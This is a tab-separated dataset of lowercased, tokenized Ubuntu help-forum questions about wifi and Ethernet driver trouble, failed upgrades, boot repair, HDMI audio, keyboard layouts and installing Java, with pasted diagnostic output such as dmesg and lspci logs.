361934	wifi home network authentication problem only with ubuntu on laptop	i have a laptop that 's currently configured as a dual-boot . the problem : i can not connect to the internet in the home wireless network through ubuntu in the apartment where i currently live . the strange part : i can connect to it just fine through windows ( as right now ) , and i can use the internet through ubuntu on this computer with all the other wireless networks i have tried . the problem is only with this particular combination . the only possible explanations i can think of are either that this network is wps , or that it 's a driver problem -- vodafone router . the router 'sees ' the computer -- and it says it 's connected ; however , i keep getting prompted for a password , and i enter the key that works with windows , but in ubuntu it just keeps asking for it repeatedly , and i ca n't access the internet . i do n't have an ethernet cable at the moment , but if someone would be so kind as to ask me questions i will gladly answer , and if you have suggestions , i will do them -- the only thing is , i am subletting this apartment from someone who is away on vacation , so i do n't want to screw with the router settings unless i know what i 'm doing ! - i do not have wicd - yes , i have the router 's information ( key works in windows ) - feedback of lshw says that the wireless card is ultimate n wifi link 5300 , vendor : intel corporation , physical id : 0 , etc . the first two commands i was told to try work ok , but when i typed sudo ifconfig wlan0 essid ... .. i got back 'essid : unknown host' would my question be better on the ubuntu forums than here on au ?
361935	ca n't connect to wifi after 13.10 update - qualcomm atheros ar93xx wireless network adapter [ 168c:0030 ] ( rev 01 )	i updated ubuntu to 13.10 last night and wifi was working fine until i went to wake up my computer this morning and no wifi connection . i am on a imac with qualcomm atheros ar93xx wireless network adapter [ 168c:0030 ] ( rev 01 ) . the only solutions i have seen so far are for broadcomm wifi drivers . there is no wifi driver in addition drivers only graphics drivers . not sure how to fix this , any help would be greatly appreciated . update : wifi works after reboot but does n't after being put to sleep nor does ethernet connect after sleep . guess i am going to have to re install ubuntu as i have n't found any fix yet , thanks anyways..
361937	boot problem 13.04	i am new to ubuntu . i was running 13.04 ( installed in september ) . today it wo n't boot . the system is only running ubuntu . the system shows no sign of starting ubuntu when turned on . i have used a live cd ( via usb ) to get into a live ubuntu session , during which i ran boot repair on recommended settings . this seemed to get stuck on the `` create boot info summary stage '' and showed no progress after 1 hour . the following info may help , but i do not know . in the boot repair advanced options the `` grub location '' , `` grub options '' and `` mbr options '' are all greyed out . when i go into disks the ssd on which the os was installed shows nothing in volumes and for contents shows `` unallocated space ( guid partition table ) '' . i am unable to access any files or folders through the gui when in the live session . thanks for reading , and for any help
361939	static wi-fi ip	i have two routers . the 2nd one is used as `` repeater bridge '' for first one . so every interface in my kubuntu has dhcp leased address from 1st router . but sometimes i need to connect to 2nd router directly to configure it . i need to do that via wi-fi . let 's say via wlan0 . all i did is i successfully run wpa_supplicant , so i can not use /etc/network/interfaces file for static configuration for wlan0 . instead i want to obtain lease via dhcp from 2nd router ( which it seems to be run and at least under windows i can see router via same mechanizm ) . my config files are : cat /etc/wpa_supplicant.conf ctrl_interface=/var/run/wpa_supplicant network= { ssid= '' ice tp-link '' scan_ssid=1 key_mgmt=wpa-psk psk= '' ... '' } cat /etc/network/interfaces ... iface wlan0 inet static address 192.168.73.177 netmask 255.255.255.0 gateway 192.168.73.1 ... i need to obtain 192.168.73.177 from 2nd router , but all time i obtained from 1st one ======== i have any network managers so i run my wi-fi via old-school init.d : cat /etc/init.d/wireless_connect.sh ... wlan_int=`ifconfig -a | grep wlan | cut -f1 -d ' ' | sort -r | xargs` case `` $ 1 '' in start ) log_daemon_msg `` starting the daemon `` `` $ name '' v_pid= $ ( wpa_suppl_running ) if [ -z $ v_pid ] ; then cmd= '' wpa_supplicant -b -dd -f $ log_file `` echo cmd= $ cmd first=1 for i in $ wlan_int ; do if [ $ first -eq 1 ] ; then first=0 else cmd= $ cmd '' -n '' fi cmd= $ cmd '' -i $ i -c/etc/wpa_supplicant.conf -dwext '' done ; fi ; echo cmd= $ cmd bash -c `` $ cmd '' dhclient -nw -v $ wlan_int 2 > > $ log_file ; ; stop ) log_daemon_msg `` stopping the daemon `` `` $ name '' v_pid= $ ( dhclient_running ) if [ -n `` $ v_pid '' ] ; then dhclient -r -v $ wlan_int 2 > > $ log_file fi ; v_pid= $ ( wpa_suppl_running ) killall wpa_supplicant ; ; ... cat /etc/dhcp/dhclient.conf : reject 192.168.83.177 ; # this one is proposed by 1st router interface `` wlan0 '' { send dhcp-requested-address 192.168.73.177 ; # that one i want to obtain } alias { interface `` wlan0 '' ; fixed-address 192.168.73.177 ; option subnet-mask 255.255.255.0 ; option routers 192.168.73.1 ; }
361943	how to mount a memory card reader/writer ?	i am trying to mount a kodak a250 50 in 1 memory card reader/writer in ubuntu 12.04 and am having a bit of trouble . when i plug it in a usb port with a 256 mg fat 16 card in it appears on my desktop but it is n't mounted ( i 'm unable to access it ) . output below from my system . -- lsb_release -a output : description : ubuntu 12.04.1 lts release : 12.04 codename : precise -- dmesg output : [ 2326.185182 ] sd 4:0:0:0 : [ sdc ] sense key : medium error [ current ] [ 2326.185188 ] sd 4:0:0:0 : [ sdc ] add . sense : unrecovered read error [ 2326.185195 ] sd 4:0:0:0 : [ sdc ] cdb : read ( 10 ) : 28 00 00 00 02 1e 00 00 01 00 [ 2326.185208 ] end_request : critical target error , dev sdc , sector 542 [ 2326.185254 ] fat-fs ( sdc1 ) : directory bread ( block 510 ) failed [ 2332.237686 ] sd 4:0:0:0 : [ sdc ] unhandled sense code [ 2332.237693 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=invalid driverbyte=driver_sense -- sudo lsusb output : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 4168:1012 bus 001 device 005 : id 048d:1336 integrated technology express , inc. -- sudo fdisk -l output : disk /dev/sdc : 260 mb , 260046848 bytes 16 heads , 32 sectors/track , 992 cylinders , total 507904 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 32 507391 253680 6 fat16
361944	can i restore my configuration files from ubuntu 13.04 to ubuntu 13.10 ?	i had to install ubuntu 13.10 from scratch after the upgrade from 13.04 hanged up in the middle . so i lost all my configurations such as firefox bookmarks etc . i restored my files from backup to another folder . now can i simply copy my restored files to the home folder instead of the new ones ? will that work ? are the configuration files compatible between 13.04 and 13.10 ?
361946	no hdmi sound on ubuntu 13.10	i have my computer connected to my sony tv , the hdmi video output works fine but i cant get the audio to work . i can see the hdmi output option in the sound settings but nothing happens . when i plug in my headphones the sound works fine do you guys have any solution to this ?
361947	how to change keyboard layout in ubuntu 13.10 ?	after upgrading to 13.10 today , my favorite layout switch ( left alt ) has stopped working . i am using gnome-fallback ( hate the new tabletish trend of unity ang gnome 3 ) after checking the layout options , i noticed that it has dramatically changed in 13.10 . i could not find layout shortcut change options anymore . now i am wondering how to define the shortcut again ?
361948	can i sell my version of ubuntu ?	i wan na customize ubuntu mini cd and sell it to companies ( make unique ubuntu version ) . is it legal ? i mean we will do absolutely different system , but making it from mini cd . yeah , i really have foss spirit , and i want to share linux and make it popular . but for live i need money , so i thought i can make different versions of ubuntu with my de and some unique things for each company . so that will be ideal job for me .
361958	realtek rtl8139/810x family fast wired connection do n't work . ( lubuntu 13.04 )	i need help with my network card , realtek rtl8139/810x family fast , i 've trying a lot of things and nothing work . its what i 've do so far.. change the driver to 8139cp and 8139too but the cp driver does not do anything , with the `` too '' start charging but nevers gets connected to internet . here is all my information maybe you will need : c aguilar @ aguilar-desktop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:13:8f : eb:65 : b4 inet6 addr : fe80 : :213:8fff : feeb:65b4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3888 errors:0 dropped:0 overruns:0 frame:0 tx packets:3888 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:293204 ( 293.2 kb ) tx bytes:293204 ( 293.2 kb ) aguilar @ aguilar-desktop : ~ $ lsmod | grep 813 8139too 23071 0 aguilar @ aguilar-desktop : ~ $ lspci -nn | grep ethernet 01:05.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) aguilar @ aguilar-desktop : ~ $ dmesg | grep eth0 [ 1.711606 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 13.379267 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 19.154786 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 25.824075 ] netdev watchdog : eth0 ( 8139too ) : transmit queue 0 timed out [ 28.832163 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 40.832057 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 64.832122 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 76.832068 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 88.832095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 106.832156 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 118.832106 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 130.832077 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 154.832081 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 324.248155 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 324.302220 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 334.016074 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 346.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 358.016137 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 370.016093 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 382.016128 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 406.016134 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 418.016051 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 430.016075 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 454.016095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 466.016048 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 478.016083 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 490.016339 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 502.016116 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 514.016149 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 526.016079 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 556.016087 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 664.016080 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 676.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 718.016074 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 730.016090 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 742.016079 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 766.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 778.016107 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 790.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 830.368249 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 830.438719 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 840.032091 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 852.016129 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 864.016144 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 876.016069 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 888.016072 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 900.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 912.016071 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 924.016143 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 948.016073 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 960.016072 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 972.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1002.016073 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1014.016290 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1026.016129 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1050.016047 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1062.016085 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1074.016116 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1092.016093 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1104.016088 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1116.016052 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1128.016081 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1146.016087 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1158.016092 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1170.016095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1194.016052 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1206.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1218.016057 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1230.016083 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 aguilar @ aguilar-desktop : ~ $ dmesg | grep 8139 [ 0.102592 ] pci 0000:01:05.0 : [ 10ec:8139 ] type 00 class 0x020000 [ 1.709759 ] 8139cp : 8139cp : 10/100 pci ethernet driver v1.3 ( mar 22 , 2004 ) [ 1.709807 ] 8139cp 0000:01:05.0 : this ( id 10ec:8139 rev 10 ) is not an 8139c+ compatible chip , use 8139too [ 1.710780 ] 8139too : 8139too fast ethernet driver 0.9.28 [ 1.711606 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 19.154786 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 25.824075 ] netdev watchdog : eth0 ( 8139too ) : transmit queue 0 timed out [ 25.824077 ] modules linked in : ppdev ( f ) snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) bnep rfcomm snd_rawmidi ( f ) bluetooth microcode ( f ) snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) snd ( f ) serio_raw ( f ) soundcore ( f ) lpc_ich shpchp parport_pc ( f ) i915 mac_hid video ( f ) drm_kms_helper drm i2c_algo_bit lp ( f ) parport ( f ) hid_generic usbhid hid usb_storage ( f ) 8139too ( f ) 8139cp ( f ) floppy ( f ) [ 28.832163 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 40.832057 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 64.832122 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 76.832068 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 88.832095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 106.832156 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 118.832106 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 130.832077 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 154.832081 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 324.242026 ] 8139too : 8139too fast ethernet driver 0.9.28 [ 324.248155 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 324.302220 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 334.016074 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 346.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 358.016137 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 370.016093 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 382.016128 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 406.016134 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 418.016051 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 430.016075 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 454.016095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 466.016048 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 478.016083 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 490.016339 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 502.016116 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 514.016149 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 526.016079 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 556.016087 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 664.016080 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 676.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 718.016074 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 730.016090 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 742.016079 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 766.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 778.016107 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 790.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 798.729069 ] 8139cp : 8139cp : 10/100 pci ethernet driver v1.3 ( mar 22 , 2004 ) [ 830.356962 ] 8139too : 8139too fast ethernet driver 0.9.28 [ 830.368249 ] 8139too 0000:01:05.0 eth0 : realtek rtl8139 at 0x0001a800 , 00:13:8f : eb:65 : b4 , irq 22 [ 830.438719 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 840.032091 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 852.016129 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 864.016144 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 876.016069 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 888.016072 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 900.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 912.016071 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 924.016143 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 948.016073 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 960.016072 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 972.016076 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1002.016073 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1014.016290 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1026.016129 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1050.016047 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1062.016085 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1074.016116 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1092.016093 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1104.016088 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1116.016052 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1128.016081 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1146.016087 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1158.016092 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1170.016095 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1194.016052 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1206.016082 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1218.016057 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 [ 1230.016083 ] 8139too 0000:01:05.0 eth0 : link up , 100mbps , full-duplex , lpa 0xc5e1 aguilar @ aguilar-desktop : ~ $ lspci 00:00.0 host bridge : intel corporation 82865g/pe/p dram controller/host-hub interface ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) 00:06.0 system peripheral : intel corporation 82865g/pe/p processor to i/o memory interface ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev c2 ) 00:1f.0 isa bridge : intel corporation 82801eb/er ( ich5/ich5r ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801eb/er ( ich5/ich5r ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801eb/er ( ich5/ich5r ) smbus controller ( rev 02 ) 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 ) 00:1f.6 modem : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 modem controller ( rev 02 ) 01:05.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) > aguilar @ aguilar-desktop : ~ $ sudo lshw -c network pci ( sysfs ) > *-network > description : ethernet interface > product : rtl-8139/8139c/8139c+ > vendor : realtek semiconductor co. , ltd. > physical id : 5 > bus info : pci @ 0000:01:05.0 > logical name : eth0 > version : 10 > serial : 00:13:8f : eb:65 : b4 > size : 10mbit/s > capacity : 100mbit/s > width : 32 bits > clock : 33mhz > capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation > configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=half latency=32 link=yes maxlatency=64 > mingnt=32 multicast=yes port=mii speed=10mbit/s > resources : irq:22 ioport : a800 ( size=256 ) memory : ff0ff800-ff0ff8ff i really really will apreciate any help , i 'm new at linux so please help me . that pc have not wireless card , so i ca n't access to internet and its the only realtek divice installed on the pc . sorry for my bad english , im 16 old and i 'm from latin america .
361959	ubuntu 13.04 to 13.10 upgrade failed	i have a vmware virtual machine running ubuntu 13.04 , and yesterday tried to upgrade to 13.10 . the install got about half way through and then everything seemed to just freeze completely . i left it going overnight to see if it was just taking a while , but this morning it was still stuck . nothing would respond at all so i had to just murder it and force a restart with vmware . now , when i try and boot the virtual machine back up , it just hangs forever at the ubuntu splash screen . how can i see what 's actually going on behind the scenes rather than just seeing the splash screen sit there ?
361960	netbeans and php project - run project in local	i 've created a little php project in netbeans 7.4 . i have ubuntu 13.04 x64 and have mysql , apache , php installed on my machine , i have also checked wether apache works and when i run localhost on firefox it says : `` it works '' . now i would like to run a php project ( for now it has only one index.php file ) from netbeans , my project folder is not in /var/www but it is in my home so i have set up firefox as browser in netbeans proprieties and tried to run the project and the page firefox is trying to load is : localhost/index.php but it does not work , it gives 404 page not found error . i have also tried to change the `` project url '' in project proprieties to http : //localhost:8080 , http : //127.0.0.1 and tried to use chromium as browser with `` chromium connector '' extension but still the same . is there maybe anything i forgot to set up ? in summary i would like to run my project , that is stored in my home , right from netbeans in localhost in order to use the apache server . how can i do that ? thanks
361962	no menu bar , start button nor terminal	i have been using ubuntu 13.04 for a few months now . but suddenly , i could n't launch terminal from the start or keyboard shortcut . i tried rebooting , but now i can not see the menu bar and start button . i managed to locate the terminal by searching in the file system , but it returns `` error in launching the application '' . i tried to reset unity based on this but even alt+f2 is not working . really perplexed now , i dont know how to even turn off the system unless by force . would be really glad if someone could help !
361963	gnome application folders	i have ubuntu gnome 13.10 . in gnome activities under all applications there is some folders containing apps . for example there is a folder called utilities which containing archive manager , calculator , system monitor , terminal etc . but i ca n't figure out how to create or remove a folder , how to add apps to an existing and remove an app from an existing folder . how to create , remove or edit a application folder ?
361965	i am unable to install java on my machine please someone help me out	this is the output thrown when i typed java -version he program 'java ' can be found in the following packages : * gcj-4.4-jre-headless * gcj-4.5-jre-headless * openjdk-6-jre-headless try : sudo apt-get install please suggest me an alternative to install java on my machine .
